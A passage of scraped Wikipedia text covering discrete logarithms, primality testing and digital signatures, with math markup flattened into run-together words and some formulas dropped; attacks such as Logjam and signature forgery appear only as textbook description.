Inmathematics, for givenreal numbersa{\displaystyle a}andb{\displaystyle b}, thelogarithmlogb⁡(a){\displaystyle \log _{b}(a)}is a numberx{\displaystyle x}such thatbx=a{\displaystyle b^{x}=a}. Analogously, in anygroupG{\displaystyle G}, powersbk{\displaystyle b^{k}}can be defined for allintegersk{\displaystyle k}, and thediscrete logarithmlogb⁡(a){\displaystyle \log _{b}(a)}is an integerk{\displaystyle k}such thatbk=a{\displaystyle b^{k}=a}. Inarithmetic moduloan integerm{\displaystyle m}, the more commonly used term isindex: One can writek=indba(modm){\displaystyle k=\mathbb {ind} _{b}a{\pmod {m}}}(read "the index ofa{\displaystyle a}to the baseb{\displaystyle b}modulom{\displaystyle m}") forbk≡a(modm){\displaystyle b^{k}\equiv a{\pmod {m}}}ifb{\displaystyle b}is aprimitive rootofm{\displaystyle m}andgcd(a,m)=1{\displaystyle \gcd(a,m)=1}. Discrete logarithms are quickly computable in a few special cases. However, no efficient method is known for computing them in general. In cryptography, the computational complexity of the discrete logarithm problem, along with its application, was first proposed in theDiffie–Hellman problem. Several importantalgorithmsinpublic-key cryptography, such asElGamal, base their security on thehardness assumptionthat the discrete logarithm problem (DLP) over carefully chosen groups has no efficient solution.[1] LetG{\displaystyle G}be any group. Denote itsgroup operationby multiplication and itsidentity elementby1{\displaystyle 1}. Letb{\displaystyle b}be any element ofG{\displaystyle G}. For any positive integerk{\displaystyle k}, the expressionbk{\displaystyle b^{k}}denotes the product ofb{\displaystyle b}with itselfk{\displaystyle k}times:[2] Similarly, letb−k{\displaystyle b^{-k}}denote the product ofb−1{\displaystyle b^{-1}}with itselfk{\displaystyle k}times. Fork=0{\displaystyle k=0}, thek{\displaystyle k}thpower is the identity:b0=1{\displaystyle b^{0}=1}. Leta{\displaystyle a}also be an element ofG{\displaystyle G}. An integerk{\displaystyle k}that solves the equationbk=a{\displaystyle b^{k}=a}is termed adiscrete logarithm(or simplylogarithm, in this context) ofa{\displaystyle a}to the baseb{\displaystyle b}. One writesk=logb⁡a{\displaystyle k=\log _{b}a}. Thepowers of 10are For any numbera{\displaystyle a}in this list, one can computelog10⁡a{\displaystyle \log _{10}a}. For example,log10⁡10000=4{\displaystyle \log _{10}{10000}=4}, andlog10⁡0.001=−3{\displaystyle \log _{10}{0.001}=-3}. These are instances of the discrete logarithm problem. Other base-10 logarithms in the real numbers are not instances of the discrete logarithm problem, because they involve non-integer exponents. For example, the equationlog10⁡53=1.724276…{\displaystyle \log _{10}{53}=1.724276\ldots }means that101.724276…{\displaystyle 10^{1.724276\ldots }}. While integer exponents can be defined in any group using products and inverses, arbitrary real exponents, such as this 1.724276…, require other concepts such as theexponential function. Ingroup-theoreticterms, the powers of 10 form acyclic groupG{\displaystyle G}under multiplication, and 10 is ageneratorfor this group. The discrete logarithmlog10⁡a{\displaystyle \log _{10}a}is defined for anya{\displaystyle a}inG{\displaystyle G}. A similar example holds for any non-zero real numberb{\displaystyle b}. The powers form a multiplicativesubgroupG={…,b−2,b−1,1,b1,b2,…}{\displaystyle G=\{\ldots ,b^{-2},b^{-1},1,b^{1},b^{2},\ldots \}}of the non-zero real numbers. For any elementa{\displaystyle a}ofG{\displaystyle G}, one can computelogb⁡a{\displaystyle \log _{b}a}. One of the simplest settings for discrete logarithms is the groupZp×. This is the group of multiplicationmodulotheprimep{\displaystyle p}. Its elements are non-zerocongruence classesmodulop{\displaystyle p}, and the group product of two elements may be obtained by ordinary integer multiplication of the elements followed by reduction modulop{\displaystyle p}. Thek{\displaystyle k}thpowerof one of the numbers in this group may be computed by finding its 'k{\displaystyle k}thpower as an integer and then finding the remainder after division byp{\displaystyle p}. When the numbers involved are large, it is more efficient to reduce modulop{\displaystyle p}multiple times during the computation. Regardless of the specific algorithm used, this operation is calledmodular exponentiation. For example, considerZ17×. To compute34{\displaystyle 3^{4}}in this group, compute34=81{\displaystyle 3^{4}=81}, and then divide81{\displaystyle 81}by17{\displaystyle 17}, obtaining a remainder of13{\displaystyle 13}. Thus34=13{\displaystyle 3^{4}=13}in the groupZ17×. The discrete logarithm is just the inverse operation. For example, consider the equation3k≡13(mod17){\displaystyle 3^{k}\equiv 13{\pmod {17}}}. From the example above, one solution isk=4{\displaystyle k=4}, but it is not the only solution. Since316≡1(mod17){\displaystyle 3^{16}\equiv 1{\pmod {17}}}—as follows fromFermat's little theorem— it also follows that ifn{\displaystyle n}is an integer then34+16n≡34⋅(316)n≡34⋅1n≡34≡13(mod17){\displaystyle 3^{4+16n}\equiv 3^{4}\cdot (3^{16})^{n}\equiv 3^{4}\cdot 1^{n}\equiv 3^{4}\equiv 13{\pmod {17}}}. Hence the equation has infinitely many solutions of the form4+16n{\displaystyle 4+16n}. Moreover, because16{\displaystyle 16}is the smallest positive integerm{\displaystyle m}satisfying3m≡1(mod17){\displaystyle 3^{m}\equiv 1{\pmod {17}}}, these are the only solutions. Equivalently, the set of all possible solutions can be expressed by the constraint thatk≡4(mod16){\displaystyle k\equiv 4{\pmod {16}}}. In the special case whereb{\displaystyle b}is the identity element1{\displaystyle 1}of the groupG{\displaystyle G}, the discrete logarithmlogb⁡a{\displaystyle \log _{b}a}is undefined fora{\displaystyle a}other than1{\displaystyle 1}, and every integerk{\displaystyle k}is a discrete logarithm fora=1{\displaystyle a=1}. Powers obey the usual algebraic identitybk+l=bk⋅bl{\displaystyle b^{k+l}=b^{k}\cdot b^{l}}.[2]In other words, thefunction defined byf(k)=bk{\displaystyle f(k)=b^{k}}is agroup homomorphismfrom the group of integersZ{\displaystyle \mathbf {Z} }under additionontothesubgroupH{\displaystyle H}ofG{\displaystyle G}generatedbyb{\displaystyle b}. For alla{\displaystyle a}inH{\displaystyle H},logb⁡a{\displaystyle \log _{b}a}exists.Conversely,logb⁡a{\displaystyle \log _{b}a}does not exist fora{\displaystyle a}that are not inH{\displaystyle H}. IfH{\displaystyle H}isinfinite, thenlogb⁡a{\displaystyle \log _{b}a}is also unique, and the discrete logarithm amounts to agroup isomorphism On the other hand, ifH{\displaystyle H}isfiniteofordern{\displaystyle n}, thenlogb⁡a{\displaystyle \log _{b}a}is 0 unique only up tocongruence modulon{\displaystyle n}, and the discrete logarithm amounts to a group isomorphism whereZn{\displaystyle \mathbf {Z} _{n}}denotes the additive group of integers modulon{\displaystyle n}. The familiar base change formula for ordinary logarithms remains valid: Ifc{\displaystyle c}is another generator ofH{\displaystyle H}, then The discrete logarithm problem is considered to be computationally intractable. That is, no efficient classical algorithm is known for computing discrete logarithms in general. A general algorithm for computinglogb⁡a{\displaystyle \log _{b}a}in finite groupsG{\displaystyle G}is to raiseb{\displaystyle b}to larger and larger powersk{\displaystyle k}until the desireda{\displaystyle a}is found. This algorithm is sometimes calledtrial multiplication. It requiresrunning timelinearin the size of the groupG{\displaystyle G}and thusexponentialin the number of digits in the size of the group. Therefore, it is an exponential-time algorithm, practical only for small groupsG{\displaystyle G}. More sophisticated algorithms exist, usually inspired by similar algorithms forinteger factorization. These algorithms run faster than the naïve algorithm, some of them proportional to thesquare rootof the size of the group, and thus exponential in half the number of digits in the size of the group. However, none of them runs inpolynomial time(in the number of digits in the size of the group). There is an efficientquantum algorithmdue toPeter Shor.[3] Efficient classical algorithms also exist in certain special cases. For example, in the group of the integers modulop{\displaystyle p}under addition, the powerbk{\displaystyle b^{k}}becomes a productb⋅k{\displaystyle b\cdot k}, and equality means congruence modulop{\displaystyle p}in the integers. Theextended Euclidean algorithmfindsk{\displaystyle k}quickly. WithDiffie–Hellman, a cyclic group modulo a primep{\displaystyle p}is used, allowing an efficient computation of the discrete logarithm with Pohlig–Hellman if the order of the group (beingp−1{\displaystyle p-1}) is sufficientlysmooth, i.e. has no largeprime factors. While computing discrete logarithms and integer factorization are distinct problems, they share some properties: There exist groups for which computing discrete logarithms is apparently difficult. In some cases (e.g. large prime order subgroups of groupsZp×{\displaystyle \mathbf {Z} _{p}^{\times }}) there is not only no efficient algorithm known for the worst case, but theaverage-case complexitycan be shown to be about as hard as the worst case usingrandom self-reducibility.[4] At the same time, the inverse problem of discrete exponentiation is not difficult (it can be computed efficiently usingexponentiation by squaring, for example). This asymmetry is analogous to the one between integer factorization and integer multiplication. Both asymmetries (and other possiblyone-way functions) have been exploited in the construction of cryptographic systems. Popular choices for the groupG{\displaystyle G}in discrete logarithm cryptography (DLC) are the cyclic groupsZp×{\displaystyle \mathbf {Z} _{p}^{\times }}(e.g.ElGamal encryption,Diffie–Hellman key exchange, and theDigital Signature Algorithm) and cyclic subgroups ofelliptic curvesoverfinite fields(seeElliptic curve cryptography). While there is no publicly known algorithm for solving the discrete logarithm problem in general, the first three steps of thenumber field sievealgorithm only depend on the groupG{\displaystyle G}, not on the specific elements ofG{\displaystyle G}whose finitelog{\displaystyle \log }is desired. Byprecomputingthese three steps for a specific group, one need only carry out the last step, which is much less computationally expensive than the first three, to obtain a specific logarithm in that group.[5] It turns out that muchinternettraffic uses one of a handful of groups that are of order 1024 bits or less, e.g. cyclic groups with order of the Oakley primes specified in RFC 2409.[6]TheLogjamattack used this vulnerability to compromise a variety of internet services that allowed the use of groups whose order was a 512-bit prime number, so calledexport grade.[5] The authors of the Logjam attack estimate that the much more difficult precomputation needed to solve the discrete log problem for a 1024-bit prime would be within the budget of a large nationalintelligence agencysuch as the U.S.National Security Agency(NSA). The Logjam authors speculate that precomputation against widely reused 1024 DH primes is behind claims inleaked NSA documentsthat NSA is able to break much of current cryptography.[5]
https://en.wikipedia.org/wiki/Discrete_logarithm_problem
Aprimality testis analgorithmfor determining whether an input number isprime. Among other fields ofmathematics, it is used forcryptography. Unlikeinteger factorization, primality tests do not generally giveprime factors, only stating whether the input number is prime or not. Factorization is thought to be a computationally difficult problem, whereas primality testing is comparatively easy (itsrunning timeispolynomialin the size of the input). Some primality tests prove that a number is prime, while others likeMiller–Rabinprove that a number iscomposite. Therefore, the latter might more accurately be calledcompositeness testsinstead of primality tests. The simplest primality test istrial division: given an input number,n{\displaystyle n}, check whether it isdivisibleby anyprime numberbetween 2 andn{\displaystyle {\sqrt {n}}}(i.e., whether the division leaves noremainder). If so, thenn{\displaystyle n}iscomposite. Otherwise, it is prime.[1]For any divisorp≥n{\displaystyle p\geq {\sqrt {n}}}, there must be another divisorn/p≤n{\displaystyle n/p\leq {\sqrt {n}}}, and a prime divisorq{\displaystyle q}ofn/p{\displaystyle n/p}, and therefore looking for prime divisors at mostn{\displaystyle {\sqrt {n}}}is sufficient. For example, consider the number 100, whose divisors are these numbers: When all possible divisors up ton{\displaystyle n}are tested, some divisors will be discoveredtwice. To observe this, consider the list of divisor pairs of 100: Products past10×10{\displaystyle 10\times 10}are the reverse of products that appeared earlier. For example,5×20{\displaystyle 5\times 20}and20×5{\displaystyle 20\times 5}are the reverse of each other. Further, that of the two divisors,5≤100=10{\displaystyle 5\leq {\sqrt {100}}=10}and20≥100=10{\displaystyle 20\geq {\sqrt {100}}=10}. This observation generalizes to alln{\displaystyle n}: all divisor pairs ofn{\displaystyle n}contain a divisor less than or equal ton{\displaystyle {\sqrt {n}}}, so the algorithm need only search for divisors less than or equal ton{\displaystyle {\sqrt {n}}}to guarantee detection of all divisor pairs.[1] Also, 2 is a prime dividing 100, which immediately proves that 100 is not prime. Every positive integer except 1 is divisible by at least one prime number by theFundamental Theorem of Arithmetic. Therefore the algorithm need only search forprimedivisors less than or equal ton{\displaystyle {\sqrt {n}}}. For another example, consider how this algorithm determines the primality of 17. One has4<17<5{\displaystyle 4<{\sqrt {17}}<5}, and the only primes≤17{\displaystyle \leq {\sqrt {17}}}are 2 and 3. Neither divides 17, proving that 17 is prime. For a last example, consider 221. One has14<221<15{\displaystyle 14<{\sqrt {221}}<15}, and the primes≤221{\displaystyle \leq {\sqrt {221}}}are 2, 3, 5, 7, 11, and 13. Upon checking each, one discovers that221/13=17{\displaystyle 221/13=17}, proving that 221 is not prime. In cases where it is not feasible to compute the list of primes≤n{\displaystyle \leq {\sqrt {n}}}, it is also possible to simply (and slowly) check all numbers between2{\displaystyle 2}andn{\displaystyle {\sqrt {n}}}for divisors. A simple improvement is to test divisibility by 2 and by just the odd numbers between 3 andn{\displaystyle {\sqrt {n}}}, since divisibility by an even number implies divisibility by 2. This method can be improved further. Observe that all primes greater than 5 are of the form6k+i{\displaystyle 6k+i}for a nonnegative integerk{\displaystyle k}andi∈{1,5}{\displaystyle i\in \{1,5\}}. Indeed, every integer is of the form6k+i{\displaystyle 6k+i}for a positive integerk{\displaystyle k}andi∈{0,1,2,3,4,5}{\displaystyle i\in \{0,1,2,3,4,5\}}. Since 2 divides6k,6k+2{\displaystyle 6k,6k+2}, and6k+4{\displaystyle 6k+4}, and 3 divides6k{\displaystyle 6k}and6k+3{\displaystyle 6k+3}, the only possible remainders mod 6 for a prime greater than 3 are 1 and 5. So, a more efficient primality test forn{\displaystyle n}is to test whethern{\displaystyle n}is divisible by 2 or 3, then to check through all numbers of the form6k+1{\displaystyle 6k+1}and6k+5{\displaystyle 6k+5}which are≤n{\displaystyle \leq {\sqrt {n}}}. This is almost three times as fast as testing all numbers up ton{\displaystyle {\sqrt {n}}}. Generalizing further, all primes greater thanc#{\displaystyle c\#}(c primorial) are of the formc#⋅k+i{\displaystyle c\#\cdot k+i}fori,k{\displaystyle i,k}positive integers,0≤i<c#{\displaystyle 0\leq i<c\#}, andi{\displaystyle i}coprimetoc#{\displaystyle c\#}. For example, consider6#=2⋅3⋅5=30{\displaystyle 6\#=2\cdot 3\cdot 5=30}. All integers are of the form30k+i{\displaystyle 30k+i}fori,k{\displaystyle i,k}integers with0≤i<30{\displaystyle 0\leq i<30}. Now, 2 divides0,2,4,…,28{\displaystyle 0,2,4,\dots ,28}, 3 divides0,3,6,…,27{\displaystyle 0,3,6,\dots ,27}, and 5 divides0,5,10,…,25{\displaystyle 0,5,10,\dots ,25}. Thus all prime numbers greater than 30 are of the form30k+i{\displaystyle 30k+i}fori∈{1,7,11,13,17,19,23,29}{\displaystyle i\in \{1,7,11,13,17,19,23,29\}}. Of course, not all numbers of the formc#⋅k+i{\displaystyle c\#\cdot k+i}withi{\displaystyle i}coprime toc#{\displaystyle c\#}are prime. For example,19⋅23=437=210⋅2+17=2⋅7#+17{\displaystyle 19\cdot 23=437=210\cdot 2+17=2\cdot 7\#+17}is not prime, even though 17 is coprime to7#=2⋅3⋅5⋅7{\displaystyle 7\#=2\cdot 3\cdot 5\cdot 7}. Asc{\displaystyle c}grows, the fraction of coprime remainders to remainders decreases, and so the time to testn{\displaystyle n}decreases (though it still necessary to check for divisibility by all primes that are less thanc{\displaystyle c}). Observations analogous to the preceding can be appliedrecursively, giving theSieve of Eratosthenes. One way to speed up these methods (and all the others mentioned below) is to pre-compute and store a list of all primes up to a certain bound, such as all primes up to 200. (Such a list can be computed with the Sieve of Eratosthenes or by an algorithm that tests each incrementalm{\displaystyle m}against all known primes≤m{\displaystyle \leq {\sqrt {m}}}). Then, before testingn{\displaystyle n}for primality with a large-scale method,n{\displaystyle n}can first be checked for divisibility by any prime from the list. If it is divisible by any of those numbers then it is composite, and any further tests can be skipped. A simple but inefficient primality test usesWilson's theorem, which states thatp{\displaystyle p}is prime if and only if: Although this method requires aboutp{\displaystyle p}modular multiplications,[2]rendering it impractical, theorems about primes and modular residues form the basis of many more practical methods. These are tests that seem to work well in practice, but are unproven and therefore are not, technically speaking, algorithms at all. TheFermat primality testand the Fibonacci test are simple examples, and they are effective when combined.John Selfridgehas conjectured that ifpis an odd number, andp≡ ±2 (mod 5), thenpwill be prime if both of the following hold: wherefkis thek-thFibonacci number. The first condition is the Fermat primality test using base 2. In general, ifp≡ a (modx2+4), whereais a quadratic non-residue (modx2+4) thenpshould be prime if the following conditions hold: f(x)kis thek-thFibonacci polynomialatx. Selfridge,Carl PomeranceandSamuel Wagstafftogether offer $620 for a counterexample.[3] Probabilistic testsare more rigorous than heuristics in that they provide provable bounds on the probability of being fooled by a composite number. Multiple popular primality tests are probabilistic tests. These tests use, apart from the tested numbern, some other numbersawhich are chosen at random from somesample space; the usual randomized primality tests never report a prime number as composite, but it is possible for a composite number to be reported as prime. The probability of error can be reduced by repeating the test with several independently chosen values ofa; for two commonly used tests, foranycompositenat least half thea's detectn's compositeness, sokrepetitions reduce the error probability to at most 2−k, which can be made arbitrarily small by increasingk. The basic structure of randomized primality tests is as follows: After one or more iterations, ifnis not found to be a composite number, then it can be declaredprobably prime. The simplest probabilistic primality test is theFermat primality test(actually a compositeness test). It works as follows: Ifan−1(modulon) is 1 butnis not prime, thennis called apseudoprimeto basea. In practice, ifan−1(modulon) is 1, thennis usually prime. But here is a counterexample: ifn= 341 anda= 2, then even though 341 = 11·31 is composite. In fact, 341 is the smallest pseudoprime base 2 (see Figure 1 of[4]). There are only 21853 pseudoprimes base 2 that are less than 2.5×1010(see page 1005 of[4]). This means that, fornup to 2.5×1010, if2n−1(modulon) equals 1, thennis prime, unlessnis one of these 21853 pseudoprimes. Some composite numbers (Carmichael numbers) have the property thatan− 1is 1 (modulon) for everyathat is coprime ton. The smallest example isn= 561 = 3·11·17, for whicha560is 1 (modulo 561) for allacoprime to 561. Nevertheless, the Fermat test is often used if a rapid screening of numbers is needed, for instance in the key generation phase of theRSA public key cryptographic algorithm. TheMiller–Rabin primality testandSolovay–Strassen primality testare more sophisticated variants, which detect all composites (once again, this means: foreverycomposite numbern, at least 3/4 (Miller–Rabin) or 1/2 (Solovay–Strassen) of numbersaare witnesses of compositeness ofn). These are also compositeness tests. The Miller–Rabin primality test works as follows: Given an integern, choose some positive integera<n. Let 2sd=n− 1, wheredis odd. If and thennis composite andais a witness for the compositeness. Otherwise,nmay or may not be prime. The Miller–Rabin test is astrong probable primetest (see PSW[4]page 1004). The Solovay–Strassen primality test uses another equality: Given an odd numbern, choose some integera<n, if thennis composite andais a witness for the compositeness. Otherwise,nmay or may not be prime. The Solovay–Strassen test is anEuler probable primetest (see PSW[4]page 1003). For each individual value ofa, the Solovay–Strassen test is weaker than the Miller–Rabin test. For example, ifn= 1905 anda= 2, then the Miller-Rabin test shows thatnis composite, but the Solovay–Strassen test does not. This is because 1905 is an Euler pseudoprime base 2 but not a strong pseudoprime base 2 (this is illustrated in Figure 1 of PSW[4]). The Miller–Rabin and the Solovay–Strassen primality tests are simple and are much faster than other general primality tests. One method of improving efficiency further in some cases is theFrobenius pseudoprimality test; a round of this test takes about three times as long as a round of Miller–Rabin, but achieves a probability bound comparable to seven rounds of Miller–Rabin. The Frobenius test is a generalization of theLucas probable primetest. TheBaillie–PSW primality testis a probabilistic primality test that combines a Fermat or Miller–Rabin test with aLucas probable primetest to get a primality test that has no known counterexamples. That is, there are no known compositenfor which this test reports thatnis probably prime.[5][6]It has been shown that there are no counterexamples forn<264{\displaystyle <2^{64}}. Leonard Adlemanand Ming-Deh Huang presented an errorless (but expected polynomial-time) variant of theelliptic curve primality test. Unlike the other probabilistic tests, this algorithm produces aprimality certificate, and thus can be used to prove that a number is prime.[7]The algorithm is prohibitively slow in practice. Ifquantum computerswere available, primality could be testedasymptotically fasterthan by using classical computers. A combination ofShor's algorithm, an integer factorization method, with thePocklington primality testcould solve the problem inO((log⁡n)3(log⁡log⁡n)2log⁡log⁡log⁡n){\displaystyle O((\log n)^{3}(\log \log n)^{2}\log \log \log n)}.[8] Near the beginning of the 20th century, it was shown that a corollary ofFermat's little theoremcould be used to test for primality.[9]This resulted in thePocklington primality test.[10]However, as this test requires a partialfactorizationofn− 1 the running time was still quite slow in the worst case. The firstdeterministicprimality test significantly faster than the naive methods was thecyclotomy test; its runtime can be proven to beO((logn)clog log logn), wherenis the number to test for primality andcis a constant independent ofn. A number of further improvements were made, but none could be proven to have polynomial running time. (Running time is measured in terms of the size of the input, which in this case is ~ logn, that being the number of bits needed to represent the numbern.) Theelliptic curve primality testcan be proven to run in O((logn)6), if some conjectures onanalytic number theoryare true.[which?]Similarly, under thegeneralized Riemann hypothesis(which Miller, confusingly, calls the "extended Riemann hypothesis"), the deterministicMiller's test, which forms the basis of the probabilistic Miller–Rabin test, can be proved to run inÕ((logn)4).[11]In practice, this algorithm is slower than the other two for sizes of numbers that can be dealt with at all. Because the implementation of these two methods is rather difficult and creates a risk of programming errors, slower but simpler tests are often preferred. In 2002, the first provably unconditional deterministic polynomial time test for primality was invented byManindra Agrawal,Neeraj Kayal, andNitin Saxena. TheAKS primality testruns in Õ((logn)12) (improved to Õ((logn)7.5)[12]in the published revision of their paper), which can be further reduced to Õ((logn)6) if theSophie Germain conjectureis true.[13]Subsequently, Lenstra and Pomerance presented a version of the test which runs in time Õ((logn)6) unconditionally.[14] Agrawal, Kayal and Saxena suggest a variant of their algorithm which would run in Õ((logn)3) ifAgrawal's conjectureis true; however, a heuristic argument by Hendrik Lenstra and Carl Pomerance suggests that it is probably false.[12]A modified version of the Agrawal's conjecture, the Agrawal–Popovych conjecture,[15]may still be true. Incomputational complexity theory, the formal language corresponding to the prime numbers is denoted as PRIMES. It is easy to show that PRIMES is inCo-NP: its complement COMPOSITES is inNPbecause one can decide compositeness by nondeterministically guessing a factor. In 1975,Vaughan Prattshowed that there existed a certificate for primality that was checkable in polynomial time, and thus that PRIMES was inNP, and therefore in⁠NP∩coNP{\displaystyle {\mathsf {NP\cap coNP}}}⁠. Seeprimality certificatefor details. The subsequent discovery of the Solovay–Strassen and Miller–Rabin algorithms put PRIMES incoRP. In 1992, the Adleman–Huang algorithm[7]reduced the complexity to⁠ZPP=RP∩coRP{\displaystyle {\mathsf {{\color {Blue}ZPP}=RP\cap coRP}}}⁠, which superseded Pratt's result. TheAdleman–Pomerance–Rumely primality testfrom 1983 put PRIMES inQP(quasi-polynomial time), which is not known to be comparable with the classes mentioned above. Because of its tractability in practice, polynomial-time algorithms assuming the Riemann hypothesis, and other similar evidence, it was long suspected but not proven that primality could be solved in polynomial time. The existence of theAKS primality testfinally settled this long-standing question and placed PRIMES inP. However, PRIMES is not known to beP-complete, and it is not known whether it lies in classes lying insidePsuch asNCorL. It is known that PRIMES is not inAC0.[16] Certain number-theoretic methods exist for testing whether a number is prime, such as theLucas testandProth's test. These tests typically require factorization ofn+ 1,n− 1, or a similar quantity, which means that they are not useful for general-purpose primality testing, but they are often quite powerful when the tested numbernis known to have a special form. The Lucas test relies on the fact that themultiplicative orderof a numberamodulonisn− 1 for a primenwhenais aprimitive root modulo n. If we can showais primitive forn, we can shownis prime.
https://en.wikipedia.org/wiki/Primality_test
Adigital signatureis a mathematical scheme for verifying the authenticity of digital messages or documents. A valid digital signature on a message gives a recipient confidence that the message came from a sender known to the recipient.[1][2] Digital signatures are a standard element of mostcryptographic protocolsuites, and are commonly used for software distribution, financial transactions,contract management software, and in other cases where it is important to detect forgery ortampering. Digital signatures are often used to implementelectronic signatures, which include any electronic data that carries the intent of a signature,[3]but not all electronic signatures use digital signatures.[4][5]Electronic signatures have legal significance in some countries, includingBrazil,Canada,[6]South Africa,[7]Russia,[8]theUnited States,Algeria,[9]Turkey,[10]India,[11]Indonesia,Mexico,Saudi Arabia,[12]Uruguay,[13]Switzerland,Chile[14]and the countries of theEuropean Union.[15][16] Digital signatures employasymmetric cryptography. In many instances, they provide a layer of validation and security to messages sent through a non-secure channel: Properly implemented, a digital signature gives the receiver reason to believe the message was sent by the claimed sender. Digital signatures are equivalent to traditional handwritten signatures in many respects, but properly implemented digital signatures are more difficult to forge than the handwritten type. Digital signature schemes, in the sense used here, are cryptographically based, and must be implemented properly to be effective. They can also providenon-repudiation, meaning that the signer cannot successfully claim they did not sign a message, while also claiming theirprivate keyremains secret.[17]Further, some non-repudiation schemes offer a timestamp for the digital signature, so that even if the private key is exposed, the signature is valid.[18][19]Digitally signed messages may be anything representable as abitstring: examples include electronic mail, contracts, or a message sent via some other cryptographic protocol. A digital signature scheme typically consists of three algorithms: Two main properties are required: First, the authenticity of a signature generated from a fixed message and fixed private key can be verified by using the corresponding public key. Secondly, it should be computationally infeasible to generate a valid signature for a party without knowing that party's private key. A digital signature is an authentication mechanism that enables the creator of the message to attach a code that acts as a signature. TheDigital Signature Algorithm(DSA), developed by theNational Institute of Standards and Technology, is one ofmany examplesof a signing algorithm. In the following discussion, 1nrefers to aunary number. Formally, adigital signature schemeis a triple of probabilistic polynomial time algorithms, (G,S,V), satisfying: For correctness,SandVmust satisfy A digital signature scheme issecureif for every non-uniform probabilistic polynomial timeadversary,A whereAS(sk, · )denotes thatAhas access to theoracle,S(sk, · ),Qdenotes the set of the queries onSmade byA, which knows the public key,pk, and the security parameter,n, andx∉Qdenotes that the adversary may not directly query the string,x, onS.[20][21] In 1976,Whitfield DiffieandMartin Hellmanfirst described the notion of a digital signature scheme, although they only conjectured that such schemes existed based on functions that are trapdoor one-way permutations.[22][23]Soon afterwards,Ronald Rivest,Adi Shamir, andLen Adlemaninvented theRSAalgorithm, which could be used to produce primitive digital signatures[24](although only as a proof-of-concept – "plain" RSA signatures are not secure[25]). The first widely marketed software package to offer digital signature wasLotus Notes1.0, released in 1989, which used the RSA algorithm.[26] Other digital signature schemes were soon developed after RSA, the earliest beingLamport signatures,[27]Merkle signatures(also known as "Merkle trees" or simply "Hash trees"),[28]andRabin signatures.[29] In 1988,Shafi Goldwasser,Silvio Micali, andRonald Rivestbecame the first to rigorously define the security requirements of digital signature schemes.[30]They described a hierarchy of attack models for signature schemes, and also presented theGMR signature scheme, the first that could be proved to prevent even an existential forgery against a chosen message attack, which is the currently accepted security definition for signature schemes.[30]The first such scheme which is not built on trapdoor functions but rather on a family of function with a much weaker required property of one-way permutation was presented byMoni NaorandMoti Yung.[31] One digital signature scheme (of many) is based onRSA. To create signature keys, generate an RSA key pair containing a modulus,N, that is the product of two random secret distinct large primes, along with integers,eandd, such thated≡1 (modφ(N)), whereφisEuler's totient function. The signer's public key consists ofNande, and the signer's secret key containsd. Used directly, this type of signature scheme is vulnerable to key-only existential forgery attack. To create a forgery, the attacker picks a random signature σ and uses the verification procedure to determine the message,m, corresponding to that signature.[32]In practice, however, this type of signature is not used directly, but rather, the message to be signed is firsthashedto produce a short digest, that is thenpaddedto larger width comparable toN, then signed with the reversetrapdoor function.[33]This forgery attack, then, only produces the padded hash function output that corresponds to σ, but not a message that leads to that value, which does not lead to an attack. In the random oracle model,hash-then-sign(an idealized version of that practice where hash and padding combined have close toNpossible outputs), this form of signature is existentially unforgeable, even against achosen-plaintext attack.[23][clarification needed][34] There are several reasons to sign such a hash (or message digest) instead of the whole document. As organizations move away from paper documents with ink signatures or authenticity stamps, digital signatures can provide added assurances of the evidence to provenance, identity, and status of anelectronic documentas well as acknowledging informed consent and approval by a signatory. The United States Government Printing Office (GPO) publishes electronic versions of the budget, public and private laws, and congressional bills with digital signatures. Universities including Penn State,University of Chicago, and Stanford are publishing electronic student transcripts with digital signatures. Below are some common reasons for applying a digital signature to communications: A message may have letterhead or a handwritten signature identifying its sender, but letterheads and handwritten signatures can be copied and pasted onto forged messages. Even legitimate messages may be modified in transit.[35] If a bank's central office receives a letter claiming to be from a branch office with instructions to change the balance of an account, the central bankers need to be sure, before acting on the instructions, that they were actually sent by a branch banker, and not forged—whether a forger fabricated the whole letter, or just modified an existing letter in transit by adding some digits. With a digital signature scheme, the central office can arrange beforehand to have a public key on file whose private key is known only to the branch office. The branch office can later sign a message and the central office can use the public key to verify the signed message was not a forgery before acting on it. A forger whodoesn'tknow the sender's private key can't sign a different message, or even change a single digit in an existing message without making the recipient's signature verification fail.[35][1][2] Encryptioncan hide the content of the message from an eavesdropper, but encryption on its own may not let recipient verify the message's authenticity, or even detectselective modifications like changing a digit—if the bank's offices simply encrypted the messages they exchange, they could still be vulnerable to forgery. In other applications, such as software updates, the messages are not secret—when a software author publishes a patch for all existing installations of the software to apply, the patch itself is not secret, but computers running the software must verify the authenticity of the patch before applying it, lest they become victims to malware.[2] Replays.A digital signature scheme on its own does not prevent a valid signed message from being recorded and then maliciously reused in areplay attack. For example, the branch office may legitimately request that bank transfer be issued once in a signed message. If the bank doesn't use a system of transaction IDs in their messages to detect which transfers have already happened, someone could illegitimately reuse the same signed message many times to drain an account.[35] Uniqueness and malleability of signatures.A signature itself cannot be used to uniquely identify the message it signs—in some signature schemes, every message has a large number of possible valid signatures from the same signer, and it may be easy, even without knowledge of the private key, to transform one valid signature into another.[36]If signatures are misused as transaction IDs in an attempt by a bank-like system such as aBitcoinexchange to detect replays, this can be exploited to replay transactions.[37] Authenticating a public key.Prior knowledge of apublic keycan be used to verify authenticity of asigned message, but not the other way around—prior knowledge of asigned messagecannot be used to verify authenticity of apublic key. In some signature schemes, given a signed message, it is easy to construct a public key under which the signed message will pass verification, even without knowledge of the private key that was used to make the signed message in the first place.[38] Non-repudiation,[15]or more specifically non-repudiation of origin, is an important aspect of digital signatures. By this property, an entity that has signed some information cannot at a later time deny having signed it. Similarly, access to the public key only does not enable a fraudulent party to fake a valid signature. Note that these authentication, non-repudiation etc. properties rely on the secret keynot having been revokedprior to its usage. Publicrevocationof a key-pair is a required ability, else leaked secret keys would continue to implicate the claimed owner of the key-pair. Checking revocation status requires an "online" check; e.g., checking acertificate revocation listor via theOnline Certificate Status Protocol.[16]Very roughly this is analogous to a vendor who receives credit-cards first checking online with the credit-card issuer to find if a given card has been reported lost or stolen. Of course, with stolen key pairs, the theft is often discovered only after the secret key's use, e.g., to sign a bogus certificate for espionage purpose. In their foundational paper, Goldwasser, Micali, and Rivest lay out a hierarchy of attack models against digital signatures:[30] They also describe a hierarchy of attack results:[30] The strongest notion of security, therefore, is security against existential forgery under an adaptive chosen message attack. All public key / private key cryptosystems depend entirely on keeping the private key secret. A private key can be stored on a user's computer, and protected by a local password, but this has two disadvantages: A more secure alternative is to store the private key on asmart card. Many smart cards are designed to be tamper-resistant (although some designs have been broken, notably byRoss Andersonand his students[39]). In a typical digital signature implementation, the hash calculated 